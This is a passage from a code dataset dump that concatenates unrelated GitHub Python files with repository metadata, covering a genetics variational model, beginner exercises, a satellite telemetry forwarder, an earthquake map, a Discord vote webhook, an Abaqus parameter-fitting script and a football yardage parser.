_nmp.ones(n_markers), _nmp.ones(n_markers)\n self.zeta, self.zeta_var = _nmp.ones((n_genes, n_markers)), _nmp.ones((n_genes, n_markers))\n self.beta, self.beta_var = _rnd.randn(n_genes, n_markers), _rnd.randn(n_genes, n_markers)\n\n self.idxs_markers = _nmp.ones(n_markers, dtype='bool')\n self.idxs_genes = _nmp.ones(n_genes, dtype='bool')\n\n def update(self, itr, **args):\n \"\"\"TODO.\"\"\"\n YTY, GTG, GTY = 
args['YTY'], args['GTG'], args['GTY']\n beta_thr, s2_lims = args['beta_thr'], args['s2_lims']\n\n # identify irrelevant genes and markers and exclude them\n idxs = (_nmp.abs(self.beta) > beta_thr) & (self.zeta * self.eta * self.tau[:, None] < 1 / s2_lims[0])\n idxs[[0, 1], [0, 1]] = True # just a precaution\n self.idxs_markers = _nmp.any(idxs, 0)\n self.idxs_genes = _nmp.any(idxs, 1)\n\n YTY = YTY[self.idxs_genes]\n GTG = GTG[:, self.idxs_markers][self.idxs_markers, :]\n GTY = GTY[self.idxs_markers, :][:, self.idxs_genes]\n\n zeta = self.zeta[self.idxs_genes, :][:, self.idxs_markers]\n eta = self.eta[self.idxs_markers]\n\n # sample beta and tau\n beta, beta_var, tau, tau_var = _update_beta_tau(YTY, GTG, GTY, zeta, eta, args['n_samples'], s2_lims)\n\n self.beta[_nmp.ix_(self.idxs_genes, self.idxs_markers)] = beta\n self.beta_var[_nmp.ix_(self.idxs_genes, self.idxs_markers)] = beta_var\n\n self.tau[self.idxs_genes] = tau\n self.tau_var[self.idxs_genes] = tau_var\n\n # sample eta and zeta\n self.zeta, self.zeta_var = _update_zeta(self.beta, self.beta_var, self.tau, self.eta)\n self.zeta = _nmp.clip(self.zeta, 1 / s2_lims[1], 1 / s2_lims[0])\n\n self.eta, self.eta_var = _update_eta(self.beta, self.beta_var, self.tau, self.zeta)\n self.eta = _nmp.clip(self.eta, 1 / s2_lims[1], 1 / s2_lims[0])\n\n def get_estimates(self, **args):\n \"\"\"TODO.\"\"\"\n return {\n 'tau': self.tau, 'tau_var': self.tau_var,\n 'zeta': self.zeta, 'zeta_var': self.zeta_var,\n 'eta': self.eta, 'eta_var': self.eta_var,\n 'beta': self.beta, 'beta_var': self.beta_var\n }\n\n def get_state(self, **args):\n \"\"\"TODO.\"\"\"\n return _nmp.sqrt((self.beta**2).sum())\n\n\ndef _update_beta_tau(YTY, GTG, GTY, zeta, eta, n_samples, s2_lims):\n \"\"\"TODO.\"\"\"\n _, n_markers = zeta.shape\n\n # update tau\n shape = 0.5 * (n_samples + n_markers)\n rate = 0.5 * YTY\n tau = shape / rate\n tau_var = shape / rate**2\n tau = _nmp.clip(tau, 1 / s2_lims[1], 1 / s2_lims[0])\n\n # sample beta\n A = GTG + zeta[:, :, None] * _nmp.diag(eta)\n beta = _utils.solve_chol_many(A, GTY.T)\n beta_var = rate[:, None] / (shape - 1) / _nmp.diagonal(A, axis1=1, axis2=2) # ??????????\n\n # S = _nmp.linalg.inv(A)\n # beta = (S * GTY.T[:, :, None]).sum(1)\n # beta_var = rate[:, None] / (shape - 1) * _nmp.diagonal(S, axis1=1, axis2=2)\n\n ##\n return beta, beta_var, tau, tau_var\n\n\ndef _update_zeta(beta, beta_var, tau, eta):\n \"\"\"TODO.\"\"\"\n # sample zeta\n shape = 0.5\n rate = 0.5 * eta * tau[:, None] * (beta**2 + beta_var)\n zeta = shape / rate\n zeta_var = shape / rate**2\n\n ##\n return zeta, zeta_var\n\n\ndef _update_eta(beta, beta_var, tau, zeta):\n \"\"\"TODO.\"\"\"\n n_genes, _ = zeta.shape\n\n # sample zeta\n shape = 0.5 * n_genes\n rate = 0.5 * (zeta * tau[:, None] * (beta**2 + beta_var)).sum(0)\n eta = shape / rate\n eta_var = shape / rate**2\n\n ##\n return eta, eta_var\n","repo_name":"dvav/eQTLseq","sub_path":"tmp/ModelNormalVB.py","file_name":"ModelNormalVB.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"31502392848","text":"\r\nwhile True:\r\n try:\r\n age = int(input(\"tell your age or year of birth \"))\r\n age_prediction = int(input(\"predict your age for the year \"))\r\n\r\n if age < 100:\r\n year = 2019 + (100 - age)\r\n print(\"you will be of 100 at \", year)\r\n if age_prediction > (year-100):\r\n pridic_age = age_prediction - (year - 100)\r\n print(f\"age at {age_prediction} is \", pridic_age)\r\n else:\r\n 
print(str(age_prediction) + \" is a wrong choice\")\r\n\r\n        elif age > 1920 and age < 2019:\r\n            year = age + 100\r\n            print(\"you will be of 100 at \", year)\r\n            if age_prediction > (year - 100):\r\n                pridic_age = age_prediction - (year - 100)\r\n                print(f\"age at {age_prediction} is \", pridic_age)\r\n\r\n        elif age > 1890 and age < 1920:\r\n            print(\"your age is above 100\")\r\n\r\n        elif age > 2019:\r\n            print(\"you haven't been born yet\")\r\n\r\n        else:\r\n            print(\"you are not of this world.\")\r\n\r\n    except Exception as e:\r\n        print(e)","repo_name":"mitalshivam1789/python","sub_path":"practice_test_1.py","file_name":"practice_test_1.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33346210310","text":"# Set type - a data structure with no duplicate elements\nnumber_list = [1, 1, 1, 2, 2, 2, 3, 3, 3]\nnumber_set = {1, 1, 1, 2, 2, 2, 3, 3, 3}\nprint(number_list, number_set)\n\n# Picking out specific elements (index, indexing) or selecting a range (slice, slicing) is NOT possible\n# print(number_set[0])\n# print(number_set[0:1])\n\n# Lists, tuples, and strings can be converted to sets.\nbasket_list = ['apple', 'apple', 'banana', 'banana', 'coconut']\nbasket_set = set(basket_list)\nprint(basket_set)\n\ntext = \"aaabbbcccddd\"\ntext_set = set(text)\nprint(text_set)","repo_name":"spencer-park/icbanq-python-beginner","sub_path":"Day02/06_set_type.py","file_name":"06_set_type.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26817983895","text":"\"\"\" CI Settings\n\"\"\"\nfrom .settings import *\n\n# Override Defender and Django Simple Captcha settings to allow for automatic\n# regression testing.\nDEFENDER_LOGIN_FAILURE_LIMIT = 1000\nCAPTCHA_TEST_MODE = True\n\nSSL_CERTIFICATES_DIR = \"certs\"\n","repo_name":"usnistgov/WIPP-Registry-docker","sub_path":"deploy/cdcs/ci_settings.py","file_name":"ci_settings.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30452399858","text":"import requests\nfrom datetime import datetime\nimport time\nimport sys\nimport socket\n\nargs = list(sys.argv)[1:]\n\nsource = args[0]\nnoradID = int(args[1])\nlat = float(args[2])\nlong = float(args[3])\n\nprint(\"Posting data: \\n Source: \"+source+\"\\n NORAD ID: \"+str(noradID)+\"\\n Latitude: \"+str(lat)+\"\\n Longitude: \"+str(long)+\"\\n\")\n\ntry:\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nexcept:\n    print(\"FAILED TO CREATE SOCKET\")\n\ntry:\n    print(\"CONNECTING TO \"+str(\"127.0.0.1\")+\":\"+str(\"8100\"))\n    s.connect(('127.0.0.1', 8100))\n    print(\"CONNECTED!\")\nexcept Exception as e:\n    print(\"CANNOT CONNECT TO SOUNDMODEM. 
ABORTING...\",e)\n #abort\n exit()\n\ndef send_sids(bcn):\n DB_TELEMETRY_ENDPOINT_URL= \"https://db.satnogs.org/api/telemetry/\"\n # SiDS parameters\n params = {\n 'noradID': noradID,\n 'source': str(source), \n 'timestamp': datetime.utcfromtimestamp(time.time()).strftime('%Y-%m-%dT%H:%M:%S.000Z'), \n 'locator': 'longLat', \n 'longitude': long, \n 'latitude': lat, \n 'frame': str(bcn), \n }\n #print(DB_TELEMETRY_ENDPOINT_URL, params)\n postSuccess = False\n while(not postSuccess):\n try:\n response = requests.post(DB_TELEMETRY_ENDPOINT_URL, data=params, timeout=10)\n print(response)\n response.raise_for_status()\n postSuccess = True\n print(\"Posted frame to Satnogs!\")\n except Exception as e:\n \n print('Could not post data to satnogs, retrying.', e)\n time.sleep(0.5)\n return\n\n\nwhile True:\n reply = str(s.recv(4096).hex())\n reply = reply[4:len(reply)-2].replace(\"\\n\",\"\").replace(\" \",\"\") #just in case\n if reply != \"\":\n #print(reply)\n send_sids(reply)\n","repo_name":"radio-satellites/satnogs-forwarder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6479351104","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport csv\nimport math\nimport argparse\nimport importlib\nimport pickle\nimport numpy\n\ndef getVelocityString(velTable):\n accelTime = velTable[-1]/10\n amp = -1\n vString = '((0, {0}), '.format(amp)\n for i in range(len(velTable)-1):\n vString += '({0}, {1}), ({2}, {3}), '.format(velTable[i]-accelTime, amp, velTable[i]+accelTime, amp*-1)\n amp = amp*-1\n vString += '({0}, {1}))'.format(velTable[-1], amp)\n return vString\n \ndef getBoundaryDisplacements(parameterizationRun):\n displacements = []\n for k in range(len(modelData.confiningStress)):\n with open(os.path.join('HOMOGENIZE', 'binaryData', '{0}({1}.{2})_homogenizedData.pkl'.format(modelData.modelName, parameterizationRun, k)), 'rb') as bundleFile:\n bundle = pickle.load(bundleFile)\n timeHistory = bundle[0]\n stressHistory = bundle[1]\n strainHistory = bundle[2]\n LE11 = [x[0,0] for x in strainHistory]\n LE22 = [x[1,1] for x in strainHistory]\n \n U1 = [x*modelData.modelSize for x in LE11]\n U2 = [x*modelData.modelSize for x in LE22]\n\n v1Tuple = [(timeHistory[i], U1[i]) for i in range(len(timeHistory))]\n v2Tuple = [(timeHistory[i], U2[i]) for i in range(len(timeHistory))]\n displacements.append((v1Tuple, v2Tuple))\n return displacements\n \ndef getBoundaryStresses(parameterizationRun):\n stresses = []\n for k in range(len(modelData.confiningStress)):\n with open(os.path.join('HOMOGENIZE', 'binaryData', '{0}({1}.{2})_homogenizedData.pkl'.format(modelData.modelName, parameterizationRun, k)), 'rb') as bundleFile:\n bundle = pickle.load(bundleFile)\n timeHistory = bundle[0]\n stressHistory = bundle[1]\n strainHistory = bundle[2]\n S11 = [-x[0,0] for x in stressHistory]\n S22 = [-x[1,1] for x in stressHistory]\n \n S1Tuple = [(timeHistory[i], S11[i]) for i in range(len(timeHistory))]\n S2Tuple = [(timeHistory[i], S22[i]) for i in range(len(timeHistory))]\n stresses.append((S1Tuple, S2Tuple))\n return stresses\n\ndef getModelParameters(parameterizationRun):\n\n parameters = {'$$mSize': modelData.modelSize,\n '$$mName': '\\''+modelData.modelName+'\\'',\n '$$sName': ['{0}({1}.{2})'.format(modelData.modelName, 0, x) for x in range(len(modelData.confiningStress))],\n '$$nSteps': modelData.numberOfSteps,\n '$$rho': modelData.rho,\n '$$confStress': [x for x in 
modelData.confiningStress], #***********************************************************fix for different confining stresses!!!!!\n '$$approxStrain': modelData.velocity[parameterizationRun]*modelData.simulationTime[parameterizationRun]/modelData.modelSize,\n '$$vel':modelData.velocity[parameterizationRun],\n '$$sTime':modelData.simulationTime[parameterizationRun],\n '$$vString':getVelocityString(modelData.velocityTable[parameterizationRun]),\n '$$boundaryDisplacements': getBoundaryDisplacements(parameterizationRun),\n '$$boundaryStresses': getBoundaryStresses(parameterizationRun),\n '$$relVars': modelData.relevantMeasurements, \n '$$abaqusMaterial':'\\''+modelData.abaqusMaterial+'\\''}\n return parameters\n \ndef getOstrichParameters(parameterizationRun):\n ostrichParametersText = '' \n ostrichParameters = material.ostrichParameters.keys()\n for parameter in ostrichParameters:\n p = material.ostrichParameters[parameter]\n newRecord = '$' + parameter + '\\t' + str(p['init']) + '\\t' + str(p['low']) + '\\t' +str(p['high']) +'\\tnone\\tnone\\tnone\\n'\n ostrichParametersText += newRecord\n \n parameters = {'$$ostrichParameters':ostrichParametersText, \n '$$ostrichObservations':observations}\n\n\n\n return parameters\n \ndef getModelConstants(fittedName):\n parameters = {}\n for parameter in material.ostrichParameters:\n parameters['${0}'.format(parameter)] = parameter\n for i in range(len(modelData.velocityTable)):\n with open(os.path.join('OSTRICH', 'ostOutput', 'OstOutput_{0}_{1}_{2}.txt'.format(fittedName, modelData.abaqusMaterial,i+1))) as ostOutputFile:\n ostOutput = ostOutputFile.read()\n startIndex = ostOutput.find('Optimal Parameter Set')\n endIndex = ostOutput.find('\\n\\n', startIndex)\n parameterBlock = ostOutput[startIndex:endIndex+1]\n for parameter in material.ostrichParameters:\n paramPosition = parameterBlock.find(parameter)\n colonPosition = parameterBlock.find(':', paramPosition)\n eolPosition = parameterBlock.find('\\n', paramPosition)\n value = float(parameterBlock[colonPosition+1:eolPosition])\n parameters['${0}'.format(parameter)] = value\n return parameters\n \n \ndef getMaterialConstants():\n parameters = {'$$$materialDef':material.abaqusTemplate}\n return parameters\n \ndef fillTemplate(template, parameters, file):\n with open(os.path.join('OSTRICH', template), 'r') as templateFile:\n t = templateFile.read()\n for i in parameters.keys():\n t = t.replace(i, str(parameters[i]))\n with open(os.path.join('OSTRICH', file), 'w') as modelFile:\n modelFile.write(t)\n \n\ndef importModelData(modelName):\n global modelData\n modelData = importlib.import_module('UDEC.modelData.'+modelName)\n\ndef importMaterialData(materialName):\n global material\n material = importlib.import_module('OSTRICH.materials.'+materialName)\n\ndef run(modelName, parameterizationRun, fittedName):\n importModelData(modelName)\n importMaterialData(modelData.abaqusMaterial)\n main(parameterizationRun, fittedName)\n\ndef main(parameterizationRun, fittedName):\n fillTemplate('parameters.tpl', getModelParameters(parameterizationRun-1), 'parameters.py')\n fillTemplate('runAbaqus.tpl', getMaterialConstants(), 'runAbaqus.temp.tpl') \n fillTemplate('runAbaqus.temp.tpl', getModelConstants(fittedName), 'runAbaqus.py') \n for j in range(len(modelData.confiningStress)):\n open(os.path.join('OSTRICH', 'fittedHistory', '{0}({1}.{2})_{3}_fittedHistory.pkl'.format(modelData.modelName, parameterizationRun-1, j, modelData.abaqusMaterial)), 'w').close()\n \n \nif __name__ == '__main__':\n parser = 
argparse.ArgumentParser(description='runAbaqusModel: Creates the Neccessary Input files to Run Abaqus model')\n parser.add_argument('-f', '--fitted-model', required=True, help='Name of the model that has been fitted to DEM data')\n parser.add_argument('-n', '--new-model', required=True, help='Name of the model to run with -f parameters')\n parser.add_argument('-r', '--run', required=True, type=int, help='Parameterization run number')\n\n args = parser.parse_args()\n fittedName = args.fitted_model\n modelName = args.new_model\n parameterizationRun = args.run\n \n importModelData(modelName)\n importMaterialData(modelData.abaqusMaterial)\n main(parameterizationRun, fittedName)\n \n \n","repo_name":"yetisir/up-frac","sub_path":"runAbaqusModel.py","file_name":"runAbaqusModel.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7847452824","text":"# Site https://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.php\n# Data from https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/all_hour.geojson\nimport json\n\nfrom plotly.graph_objs import Scattergeo, Layout\nfrom plotly import offline\n\nfile_name = './last_earthquakes.json'\n\nwith open(file_name) as f:\n data = json.load(f)\n features = data.get('features')\n\n mags, lons, lats = [], [], []\n\n for feature in features:\n mag = feature.get('properties').get('mag')\n mags.append(mag)\n\n geometry = feature.get('geometry').get('coordinates')\n lon = geometry[0]\n lat = geometry[1]\n\n lons.append(lon)\n lats.append(lat)\n\n # data = [Scattergeo(lon=lons, lat=lats)]\n\n data = [{\n 'type': 'scattergeo',\n 'lon': lons,\n 'lat': lats,\n 'marker': {\n 'color': mags,\n 'colorscale': 'Viridis',\n 'reversescale': True,\n 'colorbar': {'title': 'Mag'},\n 'size': [5*mag for mag in mags]\n },\n }]\n\n map_layout = Layout(title='Last earthquakes')\n\n fig = {'data': data, 'layout': map_layout}\n\n offline.plot(fig, filename='global_earthquakes.html')\n","repo_name":"MarcinGladkowski/python","sub_path":"python_crash_course/data_presentation/earthquakes.py","file_name":"earthquakes.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70513176554","text":"from contextlib import suppress\nfrom re import compile, escape\n\nfrom discord import (\n ButtonStyle,\n HTTPException,\n NotFound,\n PartialEmoji,\n User,\n Webhook,\n ui,\n)\nfrom topgg.types import BotVoteData\n\nfrom Classes import ShakeBot, _\n\n############\n#\n\n\nclass Link(ui.View):\n def __init__(self, link):\n super().__init__(timeout=None)\n self.add_item(\n ui.Button(\n style=ButtonStyle.blurple,\n emoji=PartialEmoji(name=\"arrow\", id=1093146865706479756),\n label=\"You can vote for Shake every 12h!\",\n url=link,\n )\n )\n\n\nclass Event:\n def __init__(self, bot: ShakeBot, data: dict):\n self.bot: ShakeBot = bot\n self.data: BotVoteData = data\n\n async def __await__(self):\n \"\"\"This functions is called whenever someone votes for the bot on Top.gg\"\"\"\n\n user: User = await self.bot.get_user_global(user_id=int(self.data.user))\n\n rep = dict(\n (escape(k), \"\") for k in [\"discord\", \"Discord\", \"everyone\", \"Everyone\"]\n )\n\n user_name = compile(\"|\".join(rep.keys())).sub(\n lambda m: rep[escape(m.group(0))], str(user)\n )\n webhooks = list(\n filter(\n lambda item: item is not None,\n [\n Webhook.from_url(webhook.link, client=self.bot)\n for webhook in 
self.bot.config.bot.webhooks\n                    if webhook.type == \"votes\"\n                ],\n            )\n        )\n        for webhook in webhooks:\n            try:\n                await webhook.edit(\n                    name=user_name, avatar=await user.avatar.read(), reason=\"Logs\"\n                )\n            except (HTTPException, NotFound, ValueError, AttributeError):\n                continue\n            else:\n                with suppress(HTTPException, NotFound):\n                    await webhook.send(\n                        content=\"{emoji} `{name}` has voted for me!\".format(\n                            emoji=PartialEmoji(\n                                animated=True, name=\"blobjoin\", id=1058033663675207820\n                            ),\n                            name=user_name,\n                        ),\n                        view=Link(self.bot.config.botlists.topgg_vote),\n                    )\n\n\n#\n############\n","repo_name":"Shake-The-Bot/Source","sub_path":"Extensions/Functions/Gateway/dblgg/dblgg.py","file_name":"dblgg.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"16876540141","text":"import re\n\n############################################################################################################\n## Play Text Yardage Play\n############################################################################################################\nclass playyards:\n    def __init__(self, text=None, playtype=None, test=False):\n        self.text = text\n        self.playtype = playtype\n        self.test = test\n        \n        self.playyards = None\n        self.kickingyards = None\n        self.runbackyards = None\n        self.penaltyyards = None\n        \n        self.yards = None\n        \n        assert self.findKickoffYards(\"Joseph Bulovas kickoff for 63 yds , Hassan Hall return for 61 yds to the Alab 37\") == 63, \"Should be 63\"\n        assert self.findKickReturnYards(\"Joseph Bulovas kickoff for 63 yds , Hassan Hall return for 61 yds to the Alab 37\") == 61, \"Should be 61\"\n        assert self.findKickoffYards(\"Evan O'Hara kickoff for 65 yds for a touchback\") == 65, \"Should be 65\"\n        assert self.findKickReturnYards(\"Evan O'Hara kickoff for 65 yds for a touchback\") == 25, \"Should be 25\"\n        assert self.findPuntYards(\"Skyler DeLong punt for 32 yds, downed at the Lvile 15\") == 32, \"Should be 32\"\n        assert self.findKickReturnYards(\"Skyler DeLong punt for 32 yds, downed at the Lvile 15\") == 0, \"Should be 0\"\n        assert self.findPenaltyYards(\"ALABAMA Penalty, Delay of Game (-5 Yards) to the Lvile 9\") == -5, \"Should be -5\"\n        \n        assert self.findPenaltyYards(\"LOUISVILLE Penalty, Substitution Infraction (-5 Yards) to the Lvile 16\") == -5, \"Should be -5\"\n        assert self.findPenaltyYards(\"LOUISVILLE Penalty, False Start (Colin Wilson) to the Alab 44\") == -5, \"Should be -5\"\n        assert self.findPenaltyYards(\"LOUISVILLE Penalty, Offensive Holding (Cole Bentley) to the Lvile 42\") == -10, \"Should be -10\"\n        assert self.findPenaltyYards(\"ALABAMA Penalty, Defensive Offside (Quinnen Williams) to the Lvile 39\") == 5, \"Should be 5\"\n        assert self.findPenaltyYards(\"ALABAMA Penalty, Delay of Game (-5 Yards) to the Lvile 9\") == -5, \"Should be -5\"\n        \n        \n        \n    def setPlay(self, text):\n        self.text = text\n        \n    def setPlayType(self, playtype):\n        self.playtype = playtype\n        \n    def makeYards(self, yards, debug=False):\n        if self.test:\n            return yards\n        \n        if yards == \"NET\" or yards == \"IGN\":\n            return yards\n        \n        if yards is None:\n            return None\n        \n        try:\n            result = int(yards)\n        except (TypeError, ValueError):\n            raise ValueError(\"Could not extract yards from [{0}] play with [{1}] text\".format(yards, self.text))\n        \n        return result\n    \n    \n    def show(self, yards, caller, debug=False):        \n        if debug:\n            print(\"\\t\\t===> {0} Yards -> [{1}]\".format(caller, yards))\n    \n    \n    
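# Added usage sketch (commentary, not part of the original file): the class\n    # is driven by setting the play text and then calling findYards(); e.g.\n    #\n    #   py = playyards(test=True)\n    #   py.setPlay(\"Skyler DeLong punt for 32 yds, downed at the Lvile 15\")\n    #   py.findYards()\n    #   print(py.yards)\n    #\n    # In test mode, makeYards() returns the parsed value unchanged.\n    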
############################################################################################################\n    ## Find Yardage\n    ############################################################################################################\n    def findYards(self, debug=False):\n        sign = 1\n        result = None\n        \n        self.findKickingYards(debug)\n        self.findReturnYards(debug)\n        self.findPlayYards(debug)\n        \n        yards = [self.playyards, self.kickingyards, self.runbackyards, self.penaltyyards]\n        if not len([x for x in yards if x is not None]):\n            if self.test is True:\n                if debug:\n                    print(\"Could not find yards in this play\")\n                self.yards = None\n            else:\n                self.yards = None\n        else:\n            if any([isinstance(x, int) for x in yards]):\n                self.yards = sum([x for x in yards if (x is not None) and (isinstance(x, int))])\n            elif any([isinstance(x, str) for x in yards]):\n                self.yards = \", \".join([x for x in yards if (x is not None) and (isinstance(x, str))])\n            else:\n                self.yards = None\n        \n\n\n    \n    ############################################################################################################\n    ## Find Play Yardage\n    ############################################################################################################\n    def findPlayYards(self, debug=False):\n        sign = 1\n        result = None\n        start = self.text\n        \n        prep = (\"(or|for)\")\n        num = \"([+-?]\\d+|\\d+)\" \n        dist = (\"(yards|yard|Yds|yds|Yd|yd)\")\n        \n        \n        #################################################################\n        ### Check for yards\n        #################################################################\n        if result is None:\n            if sum([x in self.text for x in [\"no gain\", \"no loss\", \"DECLINED\"]]) > 0:\n                result = [0]\n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))    \n\n        if result is None:\n            if sum([x in self.text for x in [\"loss of zero\", \"gain of zero\"]]) > 0:\n                result = [0]\n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))    \n\n        if result is None:\n            m = re.search(r\"{0}\\s{1}\\s{2}\".format(prep, num, dist), self.text)\n            if m is not None:\n                result = m.groups(0)\n                result = result[1:]\n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))    \n        \n        if result is None:\n            m = re.search(r\"\\w+\\s(-\\d+)\\s\\w+\", self.text)\n            if m is not None:\n                result = m.groups(0) \n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))\n\n        if result is None:\n            m = re.search(r\"for\\sa\\s(\\w+)\\sof\\s(\\d+)\\s{0}\".format(dist), self.text)\n            if m is not None:\n                results = m.groups()\n                sign = results[0]\n                result = results[1:]\n                if sign == \"loss\":\n                    sign = -1\n                result = [int(result[0])*sign]\n                if debug:\n                    print(\"\\t\\t===> {0} ({1})\".format(result, sign))\n        \n        if result is None:\n            pattern = r\"{0}\\s{1}\\spenalty\".format(num, dist)\n            m = re.search(pattern, self.text)\n            if m is not None:\n                sign = -1\n                result = m.groups()\n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))\n        \n        if result is None:\n            if sum([x in self.text for x in [\"incomplete\", \"Incomplete\"]]) > 0:\n                result = [0]\n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))\n        \n        if result is None:\n            if sum([x in self.text for x in [\" no gain\", \" No Gain\", \"failed\"]]) > 0:\n                result = [0]\n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))\n        \n        if result is None:\n            m = re.search(r\"{0}\\s{1}\".format(num, dist), self.text)\n            if m is not None:\n                result = m.groups()\n                if debug:\n                    print(\"\\t\\t===> {0}\".format(result))\n\n        if result is None:\n            result = [None]\n        self.playyards = self.makeYards(result[0])\n        self.show(self.playyards, \"Play\", debug=debug)\n\n    \n    \n\n    \n    \n    
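# Added note (not in the original): for text such as \"run for 7 yds\" the\n    # assembled prep/num/dist pattern matches ('for', '7', 'yds'); result[1:]\n    # drops the preposition group, so result[0] is the yardage string that\n    # makeYards() converts to an int (or returns unchanged in test mode).\n    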
############################################################################################################\n ## Find Punt Yardage\n ############################################################################################################\n def findPuntYards(self, text):\n kick = (\"(punt|Punt|PUNT)\")\n prep = (\"(for|For|FOR|or|Or|OR)\")\n num = \"([+-?]\\d+|\\d+)\" \n dist = (\"(yard|Yard|YARD|yd|Yd|YD)\")\n \n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), text)\n if m is not None:\n result = m.groups(0)\n yards = int(result[2])\n return yards\n return None\n \n \n ############################################################################################################\n ## Find Kickoff Yardage\n ############################################################################################################\n def findKickoffYards(self, text):\n kick = (\"(kickoff|Kickoff|KICKOFF)\")\n prep = (\"(for|For|FOR)\")\n num = \"([+-?]\\d+|\\d+)\" \n dist = (\"(yard|Yard|YARD|yd|Yd|YD)\")\n \n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), text)\n if m is not None:\n result = m.groups(0)\n yards = int(result[2])\n return yards\n return None\n \n \n ############################################################################################################\n ## Find Kick Return Yardage\n ############################################################################################################\n def findKickReturnYards(self, text):\n kick = \"(return|Return|RETURN|returns|Returns|RETURNS)\"\n prep = \"(for|For|FOR)\"\n num = \"([+-?]\\d+|\\d+)\" \n dist = \"(yard|Yard|YARD|yd|Yd|YD)\"\n\n if \"fair catch\" in text:\n return 0\n \n if \"downed at the\" in text:\n return 0\n \n if \"no gain\" in text:\n return 0\n \n if \"touchback\" in text:\n return 25\n \n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), text)\n if m is not None:\n result = m.groups(0)\n yards = int(result[2])\n return yards\n \n if \"return\" not in text:\n return 0\n \n return None\n\n\n ############################################################################################################\n ## Find Penalty Yardage\n ############################################################################################################\n def findPenaltyYards(self, text):\n num = \"([+-?]\\d+|\\d+)\" \n dist = \"(yard|Yard|YARD|yd|Yd|YD)\"\n \n pos = text.find(\"(\")\n if pos > 0:\n partext = text[pos:text.find(\")\")]\n m = re.search(r\"{0}\\s{1}\".format(num, dist), partext)\n if m is not None:\n result = m.groups(0)\n yards = int(result[0])\n return yards\n\n if \"declined\" in text:\n return 0\n \n if \"False Start\" in text:\n return -5\n \n if \"Offensive Holding\" in text:\n return -10\n \n if \"Defensive Holding\" in text:\n return 10\n \n if \"Delay of Game\" in text:\n return -5\n \n if \"Defensive Offside\" in text:\n return 5\n \n if \"Ineligible Downfield\" in text:\n return -5\n \n if \"Defensive Pass Interference\" in text:\n return 15\n \n if \"Out of Bounds\" in text:\n return 35\n \n return None\n \n\n\n \n ############################################################################################################\n ## Find Kicking Yardage\n ############################################################################################################\n def findKickingYards(self, text):\n return\n yards = None\n \n if yards is None:\n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(kick, prep, num, dist), self.text)\n if m is not None:\n 
result = m.groups(0)\n yards = result[2]\n\n self.kickingyards = self.makeYards(yards)\n self.show(self.kickingyards, \"Kicking\", debug=debug)\n\n\n \n \n\n ############################################################################################################\n ## Find Return Yardage\n ############################################################################################################\n def findReturnYards(self, debug=False):\n runback = \"(return|runback|returns)\"\n norun = \"(downed|down)\"\n prep = \"(or|for|at)\"\n article = \"(the|a)\"\n num = \"([+-?]\\d+|\\d+)\"\n word = \"(\\w+)\"\n dist = \"(yards|yard|Yds|yds|Yd|yd)\"\n \n yards = None\n \n if yards is None:\n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\".format(runback, prep, num, dist), self.text)\n if m is not None:\n result = m.groups(0)\n yards = result[2]\n \n if yards is None:\n m = re.search(r\"{0}\\s{1}\\s{2}\\s{3}\\s{4}\".format(norun, prep, article, word, num), self.text)\n if m is not None:\n result = m.groups(0)\n yards = 0\n \n if yards is None:\n if sum([x in self.text for x in [\"fair catch\", \"Fair Catch\"]]) > 0:\n yards = 0\n\n self.runbackyards = self.makeYards(yards)\n self.show(self.runbackyards, \"Return\", debug=debug)","repo_name":"tgadf/football","sub_path":"playYards.py","file_name":"playYards.py","file_ext":"py","file_size_in_byte":13292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19855470167","text":"import functools\nimport re\nfrom datetime import datetime\nfrom typing import Any, Callable, Dict, List, Optional, TypeVar\n\nfrom joint_teapot.config import settings\nfrom joint_teapot.utils.logger import logger\nfrom joint_teapot.utils.main import first, default_repo_name_convertor\nfrom joint_teapot.workers import Canvas, Git, Gitea, Mattermost\nfrom joint_teapot.workers.joj import JOJ\n\n_T = TypeVar(\"_T\")\n\n\ndef for_all_methods(\n decorator: Callable[[Callable[[_T], _T]], Any]\n) -> Callable[[_T], _T]:\n @functools.wraps(decorator)\n def decorate(cls: Any) -> Any:\n for attr in cls.__dict__: # there's probably a better way to do this\n if callable(getattr(cls, attr)):\n setattr(cls, attr, decorator(getattr(cls, attr)))\n return cls\n\n return decorate\n\n\ndef log_exception_in_loguru(func: Callable[..., Any]) -> Callable[..., Any]:\n 